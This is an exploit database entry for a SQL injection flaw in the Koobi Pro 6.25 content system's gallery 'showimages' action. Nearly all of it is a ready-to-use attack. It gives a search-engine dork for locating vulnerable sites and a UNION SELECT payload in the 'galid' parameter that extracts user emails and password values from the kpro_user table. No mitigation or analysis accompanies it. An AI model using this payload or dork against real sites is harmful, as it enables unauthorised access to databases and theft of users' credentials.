Koobi Pro 6.25 showimages Remote SQL Injection Vulnerability

2008-04-08T00:00:00
ID 1337DAY-ID-2855
Type zdt
Reporter [email protected]
Modified 2008-04-08T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ============================================================
Koobi Pro 6.25 showimages Remote SQL Injection Vulnerability
============================================================



#########################################
#
# Koobi Pro V6.25 showimages (galid)
#
###########################################
#
# DORK 1 : allinurl: "index.php?area"galid
#
###########################################
EXPLOiT :

index.php?area=1&p=gallery&action=showimages&galid=-1+union+select+0,concat(email,0x3a,pass),2+from+kpro_user

###########################################



#  0day.today [2018-04-06]  #